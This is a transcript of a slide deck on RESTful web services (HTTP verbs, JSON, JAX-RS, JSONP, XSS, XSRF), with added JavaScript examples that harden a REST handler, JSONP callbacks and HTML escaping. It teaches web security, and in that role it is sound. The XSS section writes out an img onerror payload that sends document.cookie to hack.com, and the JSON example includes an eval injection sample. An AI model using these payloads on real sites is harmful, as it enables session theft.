
Restful Web Services






Presentation Transcript


  1. Restful Web Services By Loukik Purohit & Rohit Ghatol

  2. Web service: a service such as CricInfo exchanges messages (XML/JSON) with browser, desktop and mobile clients.

  3. Using a browser: the user books the cab, the plane and the hotel one by one through the vacation subsystem; every step needs user intervention.

  4. Automated: the vacation subsystem books cab, plane and hotel by itself and confirms by SMS/email; machines interacting with each other.

  5. REST in layman's terms: an organisation with HR, Accounts and Admin departments, each holding its own records.

  6. Organized structure: to get the address of user 1, go to \Organisation\Users\1\address

  7. The same analogy applies to the web:
     • Request to get all users: http://xyz.com/users
     • Request to get user 1: http://xyz.com/users/1
     • Request to get the address of user 1: http://xyz.com/users/1/address

  8. Request-Response: GET (the response lists every user, so the request is for the collection)
     Request:
       GET /users HTTP/1.1
       Host: xyz.com
       Accept: application/xml
     Response:
       <users>
         <user><id>1</id><name>Loukik</name><address>Pune</address><skill>java</skill></user>
         <user><id>2</id><name>...</name><address>...</address><skill>...</skill></user>
       </users>

  9. Request-Response: POST
     Request:
       POST /users HTTP/1.1
       Host: xyz.com
       Content-Type: application/xml
       Accept: application/xml

       <user><name>Rohit</name><address>Pune</address><skill>C++</skill></user>
     Response (the id of the user just created):
       <result><id>3</id></result>

  10. HTTP: the whole message for updating user 3 at http://xyz.com/services/users/3
      Request line: PUT /services/users/3 HTTP/1.1 (PUT replaces the resource at that URL, so it names the user, not the collection)
      HTTP headers:
        Host: xyz.com
        Accept: application/xml
        Content-Type: application/xml
      HTTP body:
        <user><name>Rohit</name><address>Pune</address><skill>C++</skill></user>

  11. Four verbs for every noun: for the noun http://example.com/customer/123 the verbs are GET, POST, PUT and DELETE.

  12. JSON: can data be represented as lists and maps? Here's JSON. The slide parses it with
      var myObject = eval('(' + myJSONtext + ')');
      which works but executes any JavaScript hidden in the text; use JSON.parse(myJSONtext) instead (or a proper JSON parser library where JSON.parse is missing).

  13. JSON Parser

  14. How JSON looks:
      var result = {
        "users": [
          { "id": "1", "name": "loukik", "address": "Pune", "skill": "java" },
          { "id": "2", "name": "rohit", "address": "Pune", "skill": "C++" }
        ]
      };
      Accessing the JSON from JavaScript code: result.users[0].name === "loukik"
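The eval idiom on slide 12 next to its JSON.parse replacement, as an added example that is not part of the slides: the two response bodies are constructed strings, the second one showing how a "JSON-looking" body can carry code that eval will happily run. A shape check is added because JSON.parse proves syntax, not that result.users[0].name exists and is a string.

```javascript
// Added example (not from the slides): the eval('(' + text + ')') idiom from
// slide 12 beside its JSON.parse replacement, and a shape check that turns the
// parsed JSON into the users list slide 14 accesses. The two response bodies
// below are constructed strings.
const goodText =
  '{"users":[{"id":"1","name":"loukik","address":"Pune","skill":"java"},' +
  '{"id":"2","name":"rohit","address":"Pune","skill":"C++"}]}';

// Whoever controls the response body (a compromised API, an attacker on the
// network for plain http, a JSONP provider you do not run) can embed code that
// still looks like a JSON document at a glance.
let sideEffectRan = false;
const evilText =
  '{"users":[{"id":"1","name":(function(){ sideEffectRan = true; return "pwned"; })()}]}';

function parseWithEval(text) {
  return eval("(" + text + ")");   // the slide's idiom: runs any JavaScript in text
}

function parseSafely(text) {
  return JSON.parse(text);         // data only: throws SyntaxError on anything but JSON
}

function evalSideEffectObserved() {
  return sideEffectRan;
}

// Parsing proves syntax, not shape: validate before trusting result.users[0].name.
function toUsers(text) {
  const doc = parseSafely(text);
  if (!doc || !Array.isArray(doc.users)) throw new TypeError("users array missing");
  return doc.users.map((u) => {
    for (const key of ["id", "name", "address", "skill"]) {
      if (typeof u[key] !== "string") throw new TypeError(`user.${key} must be a string`);
    }
    return { id: u.id, name: u.name, address: u.address, skill: u.skill };
  });
}
```

Run with node: parseSafely(evilText) throws SyntaxError and nothing executes, while parseWithEval(evilText) returns a users list whose name is "pwned" and has flipped sideEffectRan on the way. In a browser the same body could read document.cookie or rewrite the page.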

  15. REST

  16. Programmable Web: your source for 3000+ web service APIs

  17. programmableweb.com

  18. Implementing a RESTful web service by hand:
      • Write a servlet
      • Implement doGet, doPost, doDelete (and doPut)
      • Write the business logic
      • Create your messages, in JSON
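The resource hierarchy of slides 6-11 and the hand-written service of slide 18 (one handler per verb, JSON messages), as an added example that is not the deck's code: a small in-memory "users" resource in Node.js. handle() is a pure function so it can be exercised offline; serve() wires it to Node's http module. The seed users, the port and the host name are constructed for the example.

```javascript
// Added example (not from the slides): an in-memory REST resource for the
// "users" noun, answering the four verbs over the URI hierarchy the deck uses
// (/users, /users/{id}, /users/{id}/address). handle() is a pure function so it
// can be exercised offline; serve() wires it to Node's http module. The seed
// data and host name are constructed for the example.
const users = new Map([
  [1, { id: 1, name: "Loukik", address: "Pune", skill: "java" }],
  [2, { id: 2, name: "Rohit", address: "Pune", skill: "C++" }],
]);
let nextId = 3;

function reply(status, body) {
  return {
    status,
    headers: { "Content-Type": "application/json" },
    body: body === undefined ? "" : JSON.stringify(body),
  };
}

// Only accept a well-typed user representation; anything else is a 400.
function parseUser(rawBody) {
  let data;
  try { data = JSON.parse(rawBody); } catch { return null; }
  if (!data || typeof data !== "object" || typeof data.name !== "string") return null;
  return { name: data.name, address: String(data.address ?? ""), skill: String(data.skill ?? "") };
}

// handle({ method, path, body }) -> { status, headers, body }
function handle(req) {
  const m = /^\/users(?:\/(\d+)(?:\/(address))?)?$/.exec(req.path);
  if (!m) return reply(404, { error: "no such resource" });
  const id = m[1] === undefined ? null : Number(m[1]);
  const sub = m[2];

  if (id === null) {                                  // the collection
    if (req.method === "GET") return reply(200, { users: [...users.values()] });
    if (req.method === "POST") {
      const fields = parseUser(req.body);
      if (!fields) return reply(400, { error: "bad user representation" });
      const user = { id: nextId++, ...fields };
      users.set(user.id, user);
      return reply(201, { id: user.id });             // slide 9: POST answers with the new id
    }
    return reply(405, { error: "method not allowed" });
  }

  const user = users.get(id);
  if (!user) return reply(404, { error: "no such user" });

  if (sub === "address") {                            // sub-resource, read-only here
    if (req.method === "GET") return reply(200, { address: user.address });
    return reply(405, { error: "method not allowed" });
  }

  switch (req.method) {                               // one noun, four verbs
    case "GET":
      return reply(200, user);
    case "PUT": {
      const fields = parseUser(req.body);
      if (!fields) return reply(400, { error: "bad user representation" });
      const updated = { id, ...fields };              // PUT replaces the whole representation
      users.set(id, updated);
      return reply(200, updated);
    }
    case "DELETE":
      users.delete(id);
      return reply(204);
    default:
      return reply(405, { error: "method not allowed" });
  }
}

// Real listener: node users.js --serve, then e.g. curl -i http://localhost:8080/users/1
function serve(port) {
  const http = require("http");
  return http.createServer((req, res) => {
    let body = "";
    req.on("data", (chunk) => { body += chunk; });
    req.on("end", () => {
      const out = handle({ method: req.method, path: req.url.split("?")[0], body });
      res.writeHead(out.status, out.headers);
      res.end(out.body);
    });
  }).listen(port);
}
if (process.argv.includes("--serve")) serve(8080);
```

Two points worth noticing in handle(): the URI is matched with an anchored regular expression and the id is cast to a number, so nothing from the path reaches the Map as a free-form key; and every body is parsed and type-checked before it is stored, so a client cannot inject extra fields into the representation that later gets served back out.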

  19. JAX-RS to the rescue: rather than marrying your code to the Servlet or EJB API, stay a POJO. Being single (a plain old Java object) is great! JAX-RS does the plumbing.

  20. JAX-RS: JSR 311. More info at http://java.sun.com/javaee/6/docs/tutorial/doc/giepu.html

  21. JAX-RS flow: HTTP request (JSON) → JAX-RS servlet → JAXB (@XmlRootElement) unmarshals into the POJO model → business logic → POJO model marshalled back to JSON → HTTP response

  22. Spring REST: based on Spring MVC

  23. Spring REST: negotiated view-based rendering; HTTP message converters

  24. Enunciate: your web service API goes in; your web service API plus full HTML documentation plus client-side libraries comes out.

  25. What does Enunciate do for me? From your POJOs exposed through JAX-RS or SOAP it generates the Javadoc-based documentation and client libraries (Java, C, Objective-C, .NET, GWT, AMF) that talk to the service over JSON.

  26. Enunciate
      • Enunciate is an engine for dramatically enhancing your Java web service API.
      • Enunciate is primarily a build-time tool.
      • Develop your web service API.
      • Attach Enunciate to your build process.

  27. Cross-site calls and the Same-Origin Policy: a mashup at http://geochirp.com wants to make Ajax calls to maps.google.com and twitter.com, and the browser's Same-Origin Policy stands in the way.

  28. Same-Origin Policy, imposed by the browser: a page from http://www.abc.com cannot make Ajax (XMLHttpRequest) calls to http://xyz.com, and JavaScript on ABC.com cannot read the DOM of an iframe that loaded XYZ.com.

  29. So how to do mashups? Use a proxy: the page only ever calls http://geochirp.com/proxy (same origin), and the proxy fetches from maps.google.com and twitter.com server-side on its behalf.

  30. So how to do mashups? Use JSONP: the page at http://geochirp.com makes one JSONP call to maps.google.com and another to twitter.com directly.

  31. What is JSONP? ABC.com may include a static script hosted on another domain, <script src="http://xyz.com/script.js">: including scripts hosted on other domains is allowed, while an Ajax call from ABC.com to XYZ.com is not allowed by the browser.

  32. What is JSONP? The same holds for a dynamically generated script, http://xyz.com/services/users/1?callback=myfun: including it is allowed, the equivalent Ajax call is not.

  33. JSONP explained: http://xyz.com/services/users/1?callback=myfunc
      JSON (plain data; fetched by Ajax it is subject to the Same-Origin Policy):
        { "id":"1", "name":"loukik", "address":"Pune", "skill":"java" }
      JSONP (the same data wrapped in a call to the named callback; loaded as a script there is no such restriction):
        myfunc({ "id":"1", "name":"loukik", "address":"Pune", "skill":"java" });
      Caveat: a script tag hands xyz.com full control of your page; the browser executes whatever that server returns.

  34. JSONP code example

  35. <html>
      <head>
      <script>
      // Called by the JSONP script below; data is the array of employees returned by xyz.com.
      function myfunc(data) {
        var table = document.getElementById("employees");
        for (var i = 0; i < data.length; i++) {
          var row = table.insertRow(-1);
          row.insertCell(-1).textContent = data[i].name;
          row.insertCell(-1).textContent = data[i].address;
          row.insertCell(-1).textContent = data[i].role;
        }
      }
      </script>
      </head>
      <body>
      <table id="employees"> <!-- employee table -->
      <tr><td>Name</td><td>Address</td><td>Role</td></tr>
      <tr><td>Rohit</td><td>Pune</td><td>Architect</td></tr>
      <tr><td>Loukik</td><td>Pune</td><td>Geek</td></tr>
      </table>
      <button id="addEmployee">Add</button>
      <button id="next100">Next 100</button>
      <!-- Cross-origin script include: the browser runs whatever xyz.com returns, expected to be myfunc([...]). -->
      <script src="http://xyz.com/services/fetchemployees?page=1&jsonp=myfunc"></script>
      </body>
      </html>
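The server half of the JSONP call on slide 33 and a simulation of what the script tag on slide 35 does with the answer, as an added example that is not the deck's code. The user record and the page's callback registry are constructed. The practitioner's point it adds: the callback parameter is attacker-controlled and is copied verbatim into a script that browsers will execute on xyz.com's own origin, so it must be restricted to a plain identifier.

```javascript
// Added example (not from the slides): the server half of the JSONP call on
// slide 33 (GET /services/users/1?callback=myfunc) and a simulation of what the
// <script src> tag on slide 35 does with the answer. User data and the
// registry of page callbacks are constructed; this is not the deck's code.
const user1 = { id: "1", name: "loukik", address: "Pune", skill: "java" };

// The callback name is attacker-controlled and is copied into a script the
// browser executes, so anything but a plain (dotted) identifier is refused.
// Without this, ?callback=alert(document.cookie)// turns the endpoint into a
// reflected XSS vector on the API's own origin.
const CALLBACK_RE = /^[A-Za-z_$][\w$]*(?:\.[A-Za-z_$][\w$]*)*$/;

function jsonpBody(callback, data) {
  if (typeof callback !== "string" || !CALLBACK_RE.test(callback)) {
    throw new Error("invalid callback name");
  }
  // JSON is not quite a JavaScript subset on old engines: U+2028/U+2029 are
  // legal raw inside JSON strings but were line terminators in JS before ES2019.
  const json = JSON.stringify(data)
    .replace(/\u2028/g, "\\u2028")
    .replace(/\u2029/g, "\\u2029");
  return `/**/${callback}(${json});`;   // leading comment: common anti-sniffing prefix
}

// query: the parsed query string, e.g. { callback: "myfunc" }
function jsonpResponse(query) {
  const headers = {
    "Content-Type": "application/javascript; charset=utf-8",
    "X-Content-Type-Options": "nosniff",
  };
  try {
    return { status: 200, headers, body: jsonpBody(query.callback, user1) };
  } catch (e) {
    return { status: 400, headers, body: "" };
  }
}

// Client side, simulated: a cross-origin <script> runs the body in the page's
// global scope. Here the page's globals are the keys of `pageCallbacks`.
function runJsonpInPage(body, pageCallbacks) {
  const names = Object.keys(pageCallbacks);
  const run = new Function(...names, body);
  return run(...names.map((n) => pageCallbacks[n]));
}
```

runJsonpInPage() makes the trust relationship explicit: the page has no say in what the script contains, it only provides the globals the script may call. That is why JSONP should only be pointed at providers you would let run code in your page; for anything else, the proxy of slide 29 keeps the untrusted data as data.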

  36. XSS: the attacker posts <script>attack script</script> to the ScrapBook website; a user logs in and views the page; the script runs with the user's session. Hacked!

  37. How to do XSS? What if I put HTML with some JavaScript in the scrap textarea? The server needs an XSS vulnerability: say the developer writes the posted scrap into the page with div.innerHTML:
      function postScrap() { div.innerHTML = textarea.value; }
      (Textarea → Post → DIV)

  38. How to do XSS? The server needs an XSS vulnerability; say the developer uses div.innerHTML in the code:
      function postScrap() { div.innerHTML = textarea.value; }
      Then the scrap
      <h1>Look at this cool image</h1>
      <img src="x" onerror="(new Image).src='http://hack.com/?cookie=' + encodeURI(document.cookie)">
      is parsed as markup, and the handler sends the viewer's cookie to hack.com.
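The postScrap() sink from slides 37-38 next to its hardened form, as an added example that is not the deck's code. There is no DOM in Node, so a scrap is rendered to the HTML string that div.innerHTML would receive; the payload is the slide's cookie-stealing image, spelled out so that it actually fires (the image request itself cannot read document.cookie, the onerror handler can). The div markup and the hack.com URL are the slide's; the detector is a constructed helper for the demonstration.

```javascript
// Added example (not from the slides): the postScrap() sink from slides 37-38
// next to its hardened form. No DOM here, so a scrap is rendered to the HTML
// string that div.innerHTML would receive; the payload is the slide's
// cookie-stealing image.
const scrapPayload =
  '<h1>Look at this cool image</h1>\n' +
  '<img src="x" onerror="(new Image).src=\'http://hack.com/?cookie=\' + encodeURI(document.cookie)">';

// Vulnerable: user text is parsed as markup (div.innerHTML = textarea.value).
function renderScrapUnsafe(text) {
  return `<div class="scrap">${text}</div>`;
}

// Hardened: every character HTML gives meaning to becomes an entity, which is
// what div.textContent = textarea.value does for you in a browser.
const HTML_ESCAPES = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
function escapeHtml(text) {
  return String(text).replace(/[&<>"']/g, (c) => HTML_ESCAPES[c]);
}

function renderScrapSafe(text) {
  return `<div class="scrap">${escapeHtml(text)}</div>`;
}

// Crude detector for the demonstration: does the scrap body contain anything
// the HTML parser would treat as a start tag, end tag or comment?
function bodyContainsTag(renderedDiv) {
  const body = renderedDiv.slice('<div class="scrap">'.length, -"</div>".length);
  return /<[A-Za-z!/]/.test(body);
}
```

Escape at the sink, not at the input: the same scrap may later be placed in an attribute, a URL or a script block, each with its own escaping rules. Marking the session cookie HttpOnly stops this particular payload from reading document.cookie, but the script still runs with the user's session, so it is a mitigation, not a fix.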

  39. XSRF
      • Cross-Site Request Forgery (also written CSRF).
      • Unauthorized commands are transmitted from a user that the website trusts.
      • Exploits the trust that a site has in the user's browser: the browser attaches the session cookie to every request to that site, whoever triggered it.

  40. XSRF: the user logs in to the ScrapBook website and opens their mail; the attacker has sent mail containing a script (or an image or form) that fires a request at ScrapBook; the browser attaches the user's session and the request goes through. Hacked!

  41. How to do XSRF? What if I made you visit a page that uses your session to do the attack? The browser holds your sessions. Is it possible? Yes, whenever the site accepts a request on the strength of the cookie alone.

  42. Aye mate! How come I can use Google+ and Facebook Like here?
